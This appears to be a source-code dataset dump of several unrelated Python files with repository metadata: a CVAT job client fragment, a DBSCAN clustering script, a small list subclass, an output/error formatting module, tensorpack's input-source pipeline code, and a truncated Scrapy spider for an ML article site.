url_params={"id": self.id},
pbar=pbar,
status_check_period=status_check_period,
)
self._client.logger.info(f"Annotation file '{filename}' for job #{self.id} uploaded")
def export_dataset(
self,
format_name: str,
filename: StrPath,
*,
pbar: Optional[ProgressReporter] = None,
status_check_period: Optional[int] = None,
include_images: bool = True,
) -> None:
"""
Download annotations for a job in the specified format (e.g. 'YOLO ZIP 1.0').
"""
filename = Path(filename)
if include_images:
endpoint = self.api.retrieve_dataset_endpoint
else:
endpoint = self.api.retrieve_annotations_endpoint
Downloader(self._client).prepare_and_download_file_from_endpoint(
endpoint=endpoint,
filename=filename,
url_params={"id": self.id},
query_params={"format": format_name},
pbar=pbar,
status_check_period=status_check_period,
)
self._client.logger.info(f"Dataset for job {self.id} has been downloaded to {filename}")
def get_frame(
self,
frame_id: int,
*,
quality: Optional[str] = None,
) -> io.RawIOBase:
(_, response) = self.api.retrieve_data(
self.id, number=frame_id, quality=quality, type="frame"
)
return io.BytesIO(response.data)
def get_preview(
self,
) -> io.RawIOBase:
(_, response) = self.api.retrieve_preview(self.id)
return io.BytesIO(response.data)
def download_frames(
self,
frame_ids: Sequence[int],
*,
outdir: StrPath = ".",
quality: str = "original",
filename_pattern: str = "frame_{frame_id:06d}{frame_ext}",
) -> Optional[List[Image.Image]]:
"""
Download the requested frame numbers for a job and save images as outdir/filename_pattern
"""
# TODO: add arg descriptions in schema
outdir = Path(outdir)
outdir.mkdir(parents=True, exist_ok=True)
for frame_id in frame_ids:
frame_bytes = self.get_frame(frame_id, quality=quality)
im = Image.open(frame_bytes)
mime_type = im.get_format_mimetype() or "image/jpg"
im_ext = mimetypes.guess_extension(mime_type)
# FIXME It is better to use meta information from the server
# to determine the extension
# replace '.jpe' or '.jpeg' with a more used '.jpg'
if im_ext in (".jpe", ".jpeg", None):
im_ext = ".jpg"
outfile = filename_pattern.format(frame_id=frame_id, frame_ext=im_ext)
im.save(outdir / outfile)
def get_meta(self) -> models.IDataMetaRead:
(meta, _) = self.api.retrieve_data_meta(self.id)
return meta
def get_frames_info(self) -> List[models.IFrameMeta]:
return self.get_meta().frames
def remove_frames_by_ids(self, ids: Sequence[int]) -> None:
self._client.api_client.tasks_api.jobs_partial_update_data_meta(
self.id,
patched_data_meta_write_request=models.PatchedDataMetaWriteRequest(deleted_frames=ids),
)
def get_issues(self) -> List[Issue]:
return [
Issue(self._client, m)
for m in get_paginated_collection(
self._client.api_client.issues_api.list_endpoint, job_id=str(self.id)
)
]
def get_commits(self) -> List[models.IJobCommit]:
return get_paginated_collection(self.api.list_commits_endpoint, id=self.id)
class JobsRepo(
_JobRepoBase,
ModelListMixin[Job],
ModelRetrieveMixin[Job],
):
_entity_type = Job
|
[
"noreply@github.com"
] |
shalevy1.noreply@github.com
|
baa584d709e3e9f8873f169168c932580fee809d
|
918cde4a00ba0aaf4bdce92b5767a5353ca75f15
|
/destination_prediction_porto/claster_dbscan_OD.py
|
7c99a712288acef1d2380a16f7f4c4e10f885724
|
[] |
no_license
|
haocdp/trajectory_handle
|
112a74eecd3f040bbadf30a485fcaeb922bd8519
|
89a68f8f930cca4a4a9f14ead1b234efe06a6479
|
refs/heads/master
| 2022-01-15T08:48:37.512374
| 2019-05-09T07:36:01
| 2019-05-09T07:36:01
| 155,372,147
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,646
|
py
|
#!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
import json
import time
from sklearn.cluster import DBSCAN
from sklearn import metrics
from collections import Counter
from ast import literal_eval
import csv
linux_path = "/root/TaxiData_Porto"
window_path = "K:/毕业论文/TaxiData_Porto"
file_path = window_path
def load_dataset(filename):
destination_dataSet = []
file = csv.reader(open(file_path + "/train.csv", 'r'))
flag = False
count = 0
for line in file:
if not flag:
flag = not flag
continue
if line[-2] == 'True':
continue
trajectory = literal_eval(line[-1])
if len(trajectory) >= 10 and count % 5 == 0:
destination_dataSet.append(trajectory[-1])
count += 1
return destination_dataSet
def main():
destination_dataSet = load_dataset(file_path + '/train.csv')
destination_dataset_array = np.array(destination_dataSet)
destination_db = DBSCAN(eps=0.0002, min_samples=40, metric='haversine').fit(destination_dataset_array)
destination_labels = destination_db.labels_
'''
destination points cluster
'''
destination_new_dataset = []
destination_new_labels = []
destination_list_labels = list(destination_labels)
destination_dict_lables = Counter(destination_list_labels)
for key, value in enumerate(destination_list_labels):
if value == -1 or destination_dict_lables[value] < 10:
continue
destination_new_dataset.append(destination_dataSet[key])
destination_new_labels.append(value)
destination_new_dataset = np.array(destination_new_dataset)
destination_dict_lables = Counter(destination_new_labels)
print(destination_dict_lables)
np.save(file_path + "/cluster/cluster_dataset", destination_new_dataset)
np.save(file_path + "/cluster/destination_labels", destination_new_labels)
n_clusters_ = len(set(destination_labels)) - (1 if -1 in destination_labels else 0)
print('Estimated number of destination clusters: %d' % n_clusters_)
# import pylab
# # plt.figure()
# # plt.scatter(destination_new_dataset[:, 0], destination_new_dataset[:, 1], c=destination_new_labels, s=10, cmap='seismic')
# # plt.title('destination cluster')
# # plt.show()
# pylab.scatter(destination_new_dataset[:, 0], destination_new_dataset[:, 1], c=destination_new_labels, s=10, cmap='seismic')
# pylab.savefig('cluster', format='pdf')
if __name__ == '__main__':
start = time.clock()
main()
end = time.clock()
print('finish all in %s' % str(end - start))
|
[
"1134675798@qq.com"
] |
1134675798@qq.com
|
a8a9b73dd22b86c1ad0d7bc1ed452cc1a6766292
|
840526f024ca1653b1d8c3be1afa883f23c40616
|
/0x0A-python-inheritance/1-my_list.py
|
29533b3718e30cd3d383686a2067c682b8840e9d
|
[] |
no_license
|
gotarazo/holbertonschool-higher_level_programming
|
1bc414f2cf5ac92321e5cf517f065dc0b5827c65
|
45b002ca769d8d656e5e69d1a6289f3b93b0fb56
|
refs/heads/master
| 2023-03-11T05:17:16.567731
| 2021-03-03T05:01:48
| 2021-03-03T05:01:48
| 319,824,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
#!/usr/bin/python3
"""Defines the extended version of list"""
class MyList(list):
"""Represent a extended version of MyList"""
def print_sorted(self):
"""Print the list but sorted (ascending sort)"""
print(sorted(self))
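# A minimal usage sketch (illustrative addition, not part of the original task file):
# my_list = MyList([3, 1, 2])
# my_list.append(0)
# my_list.print_sorted()   # prints [0, 1, 2, 3]
# print(my_list)           # insertion order preserved: [3, 1, 2, 0]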
|
[
"2272@holbertonschool.com"
] |
2272@holbertonschool.com
|
f0a944154f5896ac8f4bd18c9a2c110cba079dcf
|
3c58732a68a08738c01dda0157699e1361886abc
|
/common/core/output.py
|
3c7d2bf5393e583a055f4e5efa05d290dd6de88e
|
[] |
no_license
|
heewinkim/zappa-framework
|
4c3449ef6d616ad6b74aae08afb695f0407f7e94
|
bfa9af932014f0906143194b0bd3fe4cd2fb5112
|
refs/heads/master
| 2020-11-23T20:01:01.463002
| 2019-12-13T09:21:13
| 2019-12-13T09:21:13
| 227,800,247
| 2
| 0
| null | 2019-12-13T09:21:42
| 2019-12-13T09:11:44
|
Python
|
UTF-8
|
Python
| false
| false
| 6,142
|
py
|
# -*- coding: utf-8 -*-
"""
===============================================
output module
===============================================
========== ====================================
========== ====================================
Module output module
Date 2019-03-26
Author hian
Comment `Related document link <>`_
========== ====================================
*Abstract*
* Handles data output processing.
* Provides the final output in JSON form
* Provides the set_error(e) method
>>> EXAMPLE
output = Output()
output.set_output(a)
output.set_success()
print(output.get_output())
# {"statusCode": 200, "message": "success", "a": 0, "b": [1, 2, 3]}
print(output.get_output())
# {"statusCode": None, "message": None, "a": None, "b": None}
===============================================
"""
import json
import numpy as np
from .error import *
from .singleton import Singleton
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
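# Illustrative example (added): NumpyEncoder lets json.dumps handle ndarray values,
# e.g. json.dumps({'a': np.arange(3)}, cls=NumpyEncoder) == '{"a": [0, 1, 2]}'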
class Output(object,metaclass=Singleton):
def __init__(self,top_keys=['statusCode','message']):
self.output={k: None for k in top_keys}
self.default_obj=None
self.reset()
def reset(self)-> None:
"""
Resets the top-level object values to None.
:return:
"""
if self.default_obj:
self.output = self.default_obj.copy()
elif self.output:
self.output = self.output.fromkeys(self.output,None)
else:
self.output = {k: None for k in ['statusCode','message']}
def set_default(self,**kwargs):
"""
Takes keys and default_value to initialize those keys to a single value,
or takes dict_obj to update the default values of the output.
keys: list of keys to use as defaults (each initialized to default_value)
default_value: the value the keys are initialized to when keys is passed
dict_obj: a dictionary whose contents become the default values
:return: None
"""
if 'keys' in kwargs:
keys = kwargs.get('keys')
default_value = kwargs.get('default_value',None)
self.default_obj = {k: default_value for k in keys}
elif 'dict_obj' in kwargs:
self.default_obj = kwargs.get('dict_obj')
else:
raise Error(ERROR_TYPES.PREPROCESSING_ERROR,'Invalid parameter offered - set_default in Output')
self.output = self.default_obj.copy()
def set_output(self,output:dict) -> None:
"""
Stores an output given as a dictionary.
Behaves like python dict.update:
existing values are updated and new key-value pairs are added.
:param output: dictionary
:return: None
"""
self.output.update(output)
def get_output(self):
"""
Returns the output value and then resets it.
:return: json format data
"""
output = json.dumps(self.output,cls=NumpyEncoder)
self.reset()
return output
def set_error(self,e):
"""
Performs post-processing for an error.
:param e: error type
"""
if hasattr(e,'err_type'):
if e.err_type.name in ERROR_TYPES.__members__ and e.err_type.value in ERROR_TYPES._value2member_map_:
statusCode = e.err_type.value >> 16
# 400 ERROR
if statusCode == 4:
self.output['statusCode'] = 400
self.output['message'] = str(e)
# 500 ERROR
elif statusCode == 5:
self.output['statusCode'] = 500
self.output['message'] = str(e)
# 600 ERROR
elif statusCode == 6:
self.output['statusCode'] = 200
self.output['message'] = str(e)
# 700 ERROR
elif statusCode == 7:
self.output['statusCode'] = 500
self.output['message'] = '[RUNTIME_ERROR] Unexpected Error Occurred.'
else:
self.output['statusCode'] = 500
self.output['message'] = '[RUNTIME_ERROR] Unexpected Error Occurred.'
else:
if hasattr(e, 'code') and e.code == 400:
self.output['statusCode'] = 400
self.output['message'] = '[REQUEST_ERROR] Bad Request.'
elif hasattr(e, 'code') and e.code == 401:
self.output['statusCode'] = 401
self.output['message'] = '[REQUEST_ERROR] Unauthorized request.'
elif hasattr(e, 'code') and e.code == 402:
self.output['statusCode'] = 402
self.output['message'] = '[REQUEST_ERROR] Payment required.'
elif hasattr(e, 'code') and e.code == 403:
self.output['statusCode'] = 403
self.output['message'] = '[REQUEST_ERROR] Forbidden Resource.'
elif hasattr(e, 'code') and e.code == 404:
self.output['statusCode'] = 404
self.output['message'] = '[RESOURCE_ERROR] Invalid Resource requested.'
elif hasattr(e, 'code') and e.code == 405:
self.output['statusCode'] = 405
self.output['message'] = '[REQUEST_ERROR] Method not allowed.'
else:
self.output['statusCode'] = 500
self.output['message'] = '[RUNTIME_ERROR] Unexpected Error Occurred.'
def set_success(self, status=200, message='success'):
"""
Marks the output as successful.
:param status: status code
:param message: message
"""
self.output['statusCode'] = status
self.output['message'] = message
def return_output(self,result):
self.set_output(result)
self.set_success()
return self.get_output()
|
[
"heewin.kim@gmail.com"
] |
heewin.kim@gmail.com
|
2e97e9e87c5e325f0bfa0da62d4b18fee2b245e1
|
6a8def58463c194c1da44a4add13f887aec15251
|
/app.py
|
82c85c623734133630e91fae54de59d30fc9ab86
|
[] |
no_license
|
mykey007/python_learning
|
8329b5f6042fddd0f8ee3c71a5ebc903aa899979
|
8993f968d04b1d42836f3e2106e27e9a9ee633c4
|
refs/heads/master
| 2020-03-27T20:10:58.648940
| 2018-09-02T03:55:55
| 2018-09-02T03:55:55
| 147,046,034
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
character_name = "dink"
character_species = "cat"
character_age = "14"
print(" /\\")
print(" / \\")
print(" / \\")
print("/______\\")
#print(len(character_age))
#print(89 * 4322234)
#name = input("Type your name!")
#print("Hi" + name)
#num1 = input("Enter a number:")
#num2 = input("Enter another number:")
#result = float(num1) + float(num2)
#print(result)
color = input("Enter a number: ")
plural_noun = input("Enter a plural noun: ")
celebrity = input("Enter a celebrity: ")
print("Roses are " + color)
print(plural_noun + " are blue")
print("I love " + celebrity)
print("How about you???")
|
[
"mmallowe@gmail.com"
] |
mmallowe@gmail.com
|
6e6a4f6d6ad6874670c092f9a00f1ea32ee4f4db
|
d8e42e90bcadc5f821577149e4c9f869da77acc8
|
/tensorpack/input_source/input_source.py
|
88cdcb004ccae12684af7364d5970a22fe7fd48c
|
[
"Apache-2.0"
] |
permissive
|
VladMiryaha/tensorpack
|
10431dbf2d727eca9a98fc6e2185d18e65a1b665
|
fe33c8338c58b5aca2f13463de827cbd582b6bf1
|
refs/heads/master
| 2021-03-31T02:15:26.748820
| 2018-03-13T09:43:18
| 2018-03-13T09:43:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,427
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: input_source.py
import tensorflow as tf
try:
from tensorflow.python.ops.data_flow_ops import StagingArea
except ImportError:
pass
from contextlib import contextmanager
from itertools import chain
from six.moves import range, zip
import threading
from .input_source_base import InputSource
from ..dataflow import DataFlow, MapData, RepeatedData, DataFlowTerminated
from ..tfutils.summary import add_moving_summary
from ..tfutils.common import get_op_tensor_name
from ..tfutils.tower import get_current_tower_context
from ..utils import logger
from ..utils.concurrency import ShareSessionThread
from ..utils.develop import log_deprecated
from ..callbacks.base import Callback, CallbackFactory
from ..callbacks.graph import RunOp
__all__ = ['PlaceholderInput', 'FeedInput', 'FeedfreeInput',
'QueueInput', 'BatchQueueInput',
'DummyConstantInput', 'TensorInput',
'ZMQInput', 'TFDatasetInput',
'StagingInputWrapper', 'StagingInput']
def _get_reset_callback(df):
return CallbackFactory(setup_graph=lambda _: df.reset_state())
class PlaceholderInput(InputSource):
"""
Just produce placeholders as input tensors.
"""
def _setup(self, inputs):
self._all_placehdrs = [v.build_placeholder() for v in inputs]
def _get_input_tensors(self):
return self._all_placehdrs
class FeedInput(InputSource):
""" Input by iterating over a DataFlow and feed datapoints. """
class _FeedCallback(Callback):
def __init__(self, ds, placeholders):
self._ds = ds
self._itr = self._ds.get_data()
self._placeholders = placeholders
def _before_run(self, _):
dp = next(self._itr)
assert len(dp) == len(self._placeholders), "[FeedInput] datapoints and inputs are of different length!"
feed = dict(zip(self._placeholders, dp))
return tf.train.SessionRunArgs(fetches=[], feed_dict=feed)
def _reset(self):
self._itr = self._ds.get_data()
def __init__(self, ds, infinite=True):
"""
Args:
ds (DataFlow): the input DataFlow.
infinite (bool): When set to False, will raise StopIteration when
ds is exhausted.
"""
assert isinstance(ds, DataFlow), ds
self.ds = ds
if infinite:
self._iter_ds = RepeatedData(self.ds, -1)
else:
self._iter_ds = self.ds
def _size(self):
return self.ds.size()
def _setup(self, inputs):
# placeholders as input are always safe to reuse.
self._all_placehdrs = [v.build_placeholder_reuse() for v in inputs]
self._cb = self._FeedCallback(self._iter_ds, self._all_placehdrs)
def _get_input_tensors(self):
return self._all_placehdrs
def _reset_state(self):
self._cb._reset()
def _get_callbacks(self):
return [self._cb, _get_reset_callback(self._iter_ds)]
class FeedfreeInput(InputSource):
""" Abstract base for input without feed,
e.g. by queue or other operations. """
def _reset_state(self):
pass
# TODO enqueue_many? https://github.com/tensorflow/tensorflow/issues/7817#issuecomment-282053155
class EnqueueThread(ShareSessionThread):
def __init__(self, queue, ds, placehdrs):
super(EnqueueThread, self).__init__()
self.name = 'EnqueueThread ' + queue.name
self.daemon = True
self.dataflow = ds
self.queue = queue
self.placehdrs = placehdrs
self.op = self.queue.enqueue(self.placehdrs)
self.close_op = self.queue.close(cancel_pending_enqueues=True)
self._lock = threading.Lock()
# self._size = queue.size()
def run(self):
with self.default_sess():
try:
self.reinitialize_dataflow()
while True:
# pausable loop
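# Acquiring and immediately releasing the lock makes this loop block
# here while pause() holds the lock, and proceed again after resume().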
self._lock.acquire()
self._lock.release()
dp = next(self._itr)
feed = dict(zip(self.placehdrs, dp))
# _, sz = sess.run([self.op, self._sz], feed_dict=feed)
self.op.run(feed_dict=feed)
except (tf.errors.CancelledError, tf.errors.OutOfRangeError, DataFlowTerminated):
pass
except Exception as e:
if isinstance(e, RuntimeError) and 'closed Session' in str(e):
pass
else:
logger.exception("Exception in {}:".format(self.name))
finally:
try:
self.close_op.run()
except Exception:
pass
logger.info("{} Exited.".format(self.name))
def reinitialize_dataflow(self):
self._itr = self.dataflow.get_data()
def pause(self):
self._lock.acquire()
def resume(self):
self._lock.release()
class QueueInput(FeedfreeInput):
""" Enqueue datapoints from a DataFlow to a TF queue.
And the model receives dequeued tensors.
Calling :meth:`reset_state()` will clear the queue and reset the dataflow.
"""
def __init__(self, ds, queue=None):
"""
Args:
ds(DataFlow): the input DataFlow.
queue (tf.QueueBase): A :class:`tf.QueueBase` whose type
should match the corresponding InputDesc of the model.
Defaults to a FIFO queue of size 50.
"""
assert isinstance(ds, DataFlow), ds
self.queue = queue
self.ds = ds
self._inf_ds = RepeatedData(ds, -1)
self._started = False
def _size(self):
return self.ds.size()
def _setup(self, inputs):
self._input_placehdrs = [v.build_placeholder_reuse() for v in inputs]
assert len(self._input_placehdrs) > 0, \
"QueueInput has to be used with some inputs!"
with self.cached_name_scope():
if self.queue is None:
self.queue = tf.FIFOQueue(
50, [x.dtype for x in self._input_placehdrs],
name='input_queue')
logger.info("Setting up the queue '{}' for CPU prefetching ...".format(self.queue.name))
self.thread = EnqueueThread(self.queue, self._inf_ds, self._input_placehdrs)
self._dequeue_op = self.queue.dequeue(name='dequeue_for_reset')
def refill_queue(self):
"""
Clear the queue, then call dataflow.get_data() again and fill into the queue.
"""
self.thread.pause() # pause enqueue
opt = tf.RunOptions()
opt.timeout_in_ms = 2000 # 2s
sess = tf.get_default_session()
# dequeue until empty
try:
while True:
sess.run(self._dequeue_op, options=opt)
except tf.errors.DeadlineExceededError:
pass
# reset dataflow, start thread
self.thread.reinitialize_dataflow()
self.thread.resume()
def _create_ema_callback(self):
"""
Create a hook-only callback which maintain EMA of the queue size.
Also tf.summary.scalar the EMA.
"""
with self.cached_name_scope():
# in TF there is no API to get queue capacity, so we can only summary the size
size = tf.cast(self.queue.size(), tf.float32, name='queue_size')
size_ema_op = add_moving_summary(size, collection=None, decay=0.5)[0].op
return RunOp(
lambda: size_ema_op,
run_before=False,
run_as_trigger=False,
run_step=True)
def _get_callbacks(self):
from ..callbacks.concurrency import StartProcOrThread
cb = StartProcOrThread(self.thread)
return [cb, self._create_ema_callback(), _get_reset_callback(self._inf_ds)]
def _get_input_tensors(self):
with tf.device('/cpu:0'), self.cached_name_scope():
ret = self.queue.dequeue(name='input_deque')
if isinstance(ret, tf.Tensor): # only one input
ret = [ret]
assert len(ret) == len(self._input_placehdrs)
for qv, v in zip(ret, self._input_placehdrs):
qv.set_shape(v.get_shape())
return ret
class BatchQueueInput(QueueInput):
""" Enqueue datapoints from a DataFlow to a TF queue.
And the model receives batches formed by concatenating
dequeued tensors.
"""
def __init__(self, ds, batch_size, queue=None):
"""
Args:
ds(DataFlow): the input DataFlow.
batch_size(int): the batch size.
queue (tf.QueueBase): A :class:`tf.QueueBase` whose type
should match the corresponding InputDesc of the model.
Defaults to a FIFO queue of size 3000.
"""
super(BatchQueueInput, self).__init__(ds, queue)
self.batch_size = int(batch_size)
def _size(self):
return self.ds.size() // self.batch_size
def _setup(self, inputs):
logger.info("Setting up the queue for CPU prefetching ...")
self.input_placehdrs = [v.build_placeholder_reuse() for v in inputs]
assert len(self.input_placehdrs) > 0, \
"BatchQueueInput has to be used with some InputDesc!"
# prepare placeholders without the first dimension
placehdrs_nobatch = []
for p in self.input_placehdrs:
placehdrs_nobatch.append(tf.placeholder(
dtype=p.dtype, shape=p.get_shape().as_list()[1:],
name=get_op_tensor_name(p.name)[0] + '-nobatch'))
# dequeue_many requires fully-defined shapes
shape_err = "Use of BatchQueueInput requires inputs to have fully-defined "
"shapes except for the batch dimension"
shapes = []
for p in placehdrs_nobatch:
assert p.get_shape().is_fully_defined(), shape_err
shapes.append(p.get_shape())
with self.cached_name_scope():
if self.queue is None:
self.queue = tf.FIFOQueue(
3000, [x.dtype for x in self.input_placehdrs],
shapes=shapes,
name='input_queue')
for shp in self.queue.shapes:
assert shp.is_fully_defined(), shape_err
self.thread = EnqueueThread(self.queue, self._inf_ds, placehdrs_nobatch)
def _get_input_tensors(self):
with tf.device('/cpu:0'), self.cached_name_scope():
ret = self.queue.dequeue_many(self.batch_size, name='input_deque')
if isinstance(ret, tf.Tensor): # only one input
ret = [ret]
assert len(ret) == len(self.input_placehdrs)
for qv, v in zip(ret, self.input_placehdrs):
shp = v.get_shape().as_list()
shp[0] = self.batch_size
qv.set_shape(shp)
return ret
# TODO tensor inputs can be drained? look at the new dataset API.
class TensorInput(FeedfreeInput):
""" Input from a list of tensors, e.g. a TF data reading pipeline.
The PTB training example shows how to use it.
"""
def __init__(self, get_tensor_fn, size=None):
"""
Args:
get_tensor_fn: a function which returns a list of input tensors
when called. It will be called under a TowerContext.
size(int): size of this input. Use None to leave it undefined.
"""
self.get_tensor_fn = get_tensor_fn
if size is not None:
size = int(size)
assert size > 0
self._fixed_size = size
def _setup(self, inputs_desc):
self._desc = inputs_desc
def _size(self):
if self._fixed_size is None:
raise NotImplementedError("size of TensorInput is undefined!")
return self._fixed_size
def _get_input_tensors(self):
with self.cached_name_scope():
ret = self.get_tensor_fn()
assert len(ret) == len(self._desc), "{} != {}".format(len(ret), len(self._desc))
return ret
class DummyConstantInput(TensorInput):
""" Input with a constant zero tensor placed on GPU.
Useful for debugging performance issues """
def __init__(self, shapes):
"""
Args:
shapes (list[list]): a list of fully-specified shapes.
"""
self.shapes = shapes
logger.warn("Using dummy input for debug!")
def fn():
tlist = []
ctx = get_current_tower_context()
assert ctx is not None
assert len(self.shapes) == len(self._desc)
for idx, p in enumerate(self._desc):
tlist.append(tf.constant(
0, dtype=p.type,
name='dummy-{}-{}'.format(p.name, ctx.index),
shape=self.shapes[idx]))
return tlist
super(DummyConstantInput, self).__init__(fn)
class ZMQInput(TensorInput):
"""
Recv tensors from a ZMQ endpoint, with ops from https://github.com/tensorpack/zmq_ops.
It works with :meth:`dataflow.remote.send_dataflow_zmq(format='zmq_op')`.
"""
def __init__(self, end_point, hwm, bind=True):
"""
Args:
end_point (str):
hwm (int):
"""
self._end_point = end_point
self._hwm = int(hwm)
self._bind = bind
def fn():
ret = self._zmq_pull_socket.pull()
assert len(ret) == len(self._desc)
for qv, v in zip(ret, self._desc):
qv.set_shape(v.shape)
return ret
super(ZMQInput, self).__init__(fn)
def _setup(self, inputs_desc):
assert len(inputs_desc) > 0, \
"ZMQInput has to be used with InputDesc!"
self._desc = inputs_desc
import zmq_ops
self._zmq_pull_socket = zmq_ops.ZMQPullSocket(
self._end_point,
[x.type for x in inputs_desc],
hwm=self._hwm,
bind=self._bind)
class TFDatasetInput(FeedfreeInput):
"""
Use a :class:`tf.contrib.data.Dataset` instance as input.
Note:
In training, the dataset should be infinite (use :func:`repeat()`).
"""
def __init__(self, dataset):
"""
Args:
dataset (tf.contrib.data.Dataset):
"""
self._dataset = dataset
def _setup(self, inputs_desc):
self._desc = inputs_desc
types = self._dataset.output_types
desc_types = tuple([k.type for k in inputs_desc])
assert len(types) == len(desc_types), \
"Dataset and InputDesc has different length! {} != {}".format(
len(types), len(desc_types))
assert types == desc_types, \
"Types of dataset and InputDesc don't match! {} != {}".format(
str(types), str(desc_types))
shapes = self._dataset.output_shapes
desc_shapes = [k.shape for k in inputs_desc]
for idx, (s1, s2) in enumerate(zip(shapes, desc_shapes)):
s2 = tf.TensorShape(s2)
assert s2.is_compatible_with(s1), \
"InputDesc '{}' has incompatible shape with dataset! {} vs {}".format(
inputs_desc[idx].name, s2, s1)
self._iterator = self._dataset.make_initializable_iterator()
self._init_op = self._iterator.initializer
def _reset_state(self):
self._init_op.run()
def _get_input_tensors(self):
desc_shapes = [k.shape for k in self._desc]
ret = self._iterator.get_next()
assert len(ret) == len(desc_shapes)
for t, shp in zip(ret, desc_shapes):
t.set_shape(shp)
return ret
@staticmethod
def dataflow_to_dataset(df, types):
"""
Wrap a dataflow to tf.data.Dataset.
Will also reset the dataflow.
If for training, you'll need to add `.repeat()` on the returned
dataset, if the dataflow iterator can terminate.
Args:
df (DataFlow)
types([tf.DType])
Returns:
(tf.data.Dataset)
"""
assert isinstance(df, DataFlow), df
assert isinstance(types, (list, tuple)), types
df = MapData(df, lambda dp: tuple(dp))
df.reset_state()
ds = tf.data.Dataset.from_generator(
df.get_data, tuple(types))
return ds
class StagingInput(FeedfreeInput):
"""
A wrapper around a feedfree input,
to prefetch the input in StagingArea (on GPUs).
"""
class StagingCallback(Callback):
"""
A callback registered by this input source, to make sure stage/unstage
is run at each step.
"""
def __init__(self, input, nr_stage):
self.nr_stage = nr_stage
self._input = input
self._initialized = False
def _setup_graph(self):
self.stage_op = self._input._get_stage_op()
unstage_op = self._input._get_unstage_op()
self.fetches = tf.train.SessionRunArgs(
fetches=[self.stage_op, unstage_op])
def _prefill(self):
logger.info("Pre-filling StagingArea ...")
for k in range(self.nr_stage):
self.stage_op.run()
logger.info("Successfully put {} element{} to StagingArea.".format(
self.nr_stage, "s" if self.nr_stage > 1 else ""))
def _before_run(self, ctx):
# This has to happen once, right before the first iteration.
if not self._initialized:
self._initialized = True
self._prefill()
return self.fetches
def __init__(self, input, towers=None, nr_stage=1, device=None):
"""
Args:
input (FeedfreeInput):
nr_stage: number of elements to prefetch into each StagingArea, at the beginning.
Since enqueue and dequeue are synchronized, prefetching 1
element should be sufficient.
towers: deprecated
device (str or None): if not None, place the StagingArea on a specific device. e.g., '/cpu:0'.
Otherwise, they are placed under where `get_inputs_tensors`
gets called, which could be unspecified in case of simple trainers.
"""
assert isinstance(input, FeedfreeInput), input
self._input = input
if towers is not None:
log_deprecated("StagingInput(towers=)", "Devices are handled automatically.", "2018-03-31")
self._nr_stage = nr_stage
self._areas = []
self._stage_ops = []
self._unstage_ops = []
self._device = device
def _setup(self, inputs):
self._input.setup(inputs)
with self.cached_name_scope():
pass # just to cache the correct ns to use
def _get_callbacks(self):
cbs = self._input.get_callbacks()
# this callback has to happen after others, so StagingInput can be stacked together
cbs.append(
StagingInput.StagingCallback(self, self._nr_stage))
return cbs
def _size(self):
return self._input.size()
@contextmanager
def _device_ctx(self):
if not self._device:
yield
else:
with tf.device(self._device):
yield
def _get_input_tensors(self):
with self.cached_name_scope(), self._device_ctx():
inputs = self._input.get_input_tensors()
# Putting variables to stagingarea will cause trouble
dtypes = []
for idx in range(len(inputs)):
dtype = inputs[idx].dtype
if dtype.base_dtype != dtype: # is reference type
inputs[idx] = tf.identity(inputs[idx])
dtypes.append(dtype.base_dtype)
# TODO tensorflow/benchmarks use static shapes here,
# though it doesn't seem to help. We can use it when it's known.
stage = StagingArea(dtypes, shapes=None)
# put & get automatically inherit the name scope from the area
self._stage_ops.append(stage.put(inputs))
self._areas.append(stage)
outputs = stage.get()
if isinstance(outputs, tf.Tensor): # when size=1, TF doesn't return a list
outputs = [outputs]
for vin, vout in zip(inputs, outputs):
vout.set_shape(vin.get_shape())
self._unstage_ops.append(outputs)
# self._size_ops.append(stage.size())
return outputs
def _get_stage_op(self):
with self.cached_name_scope():
return tf.group(*self._stage_ops)
def _get_unstage_op(self):
with self.cached_name_scope():
all_outputs = list(chain.from_iterable(self._unstage_ops))
return tf.group(*all_outputs)
# for debugging only
def _create_ema_callback(self):
def create_ema_op():
with self.cached_name_scope():
avg_size = tf.truediv(tf.add_n(self._size_ops), len(self._size_ops), name='avg_stagingarea_size')
return add_moving_summary(avg_size, collection=None)[0].op
return RunOp(
create_ema_op,
run_before=False,
run_as_trigger=False,
run_step=True)
StagingInputWrapper = StagingInput
|
[
"ppwwyyxxc@gmail.com"
] |
ppwwyyxxc@gmail.com
|
11b00cf27e6a9fee9230b5a1559295209753ad1c
|
f2ae5eb0ef13040c9311be57b59c4998c33280d7
|
/fintech/fintech/spiders/其他/aiq_ml.py
|
c690dbfd5134665ac36a12f7cafcab2674f906d9
|
[] |
no_license
|
ReggieFan/spider
|
70f1ec49b01201b3a4d2f2abc051915ca0f9aec2
|
68be9032897f8911ed0fc94d8cb90115937a7d44
|
refs/heads/master
| 2020-07-06T13:06:18.264650
| 2019-08-18T16:08:43
| 2019-08-18T16:08:43
| 203,026,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,048
|
py
|
# -*- coding: utf-8 -*-
import scrapy
from fintech.items.antfin import AntfinItem  # not sure why this line is flagged as an error; it runs fine
from scrapy.http import Request
from urllib.parse import quote
from bs4 import BeautifulSoup
class AiqMlSpider(scrapy.Spider):
name = 'aiq_ml'
allowed_domains = ['6aiq.com']
start_urls = ['http://6aiq.com/']
def start_requests(self):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
num=40
for i in range(1,41):
yield Request('http://www.6aiq.com/domain/machine_learning?p='+str(i),
self.parse,headers=headers)
print('AIQ machine learning: ' + '%.2f' % ((i - 1) / num * 100) + "%")
def parse(self, response):
bsObj = BeautifulSoup(response.text, "lxml")
bs = bsObj.find(attrs={'class': 'article-list list'})
for j in bs.find_all('h2'):
yield Request(j.a.get('href'),self.parse_2,
meta={'url':j.a.get('href')})
def parse_2(self,response):
# print('parse2')
bsObj = BeautifulSoup(response.text, "lxml")
# print (response.text)
bs = bsObj.find(attrs={'class': 'content-reset article-content'})
content=''
for i in bs.find_all('p')[:-2]:
content = f'{content}{i.text}'
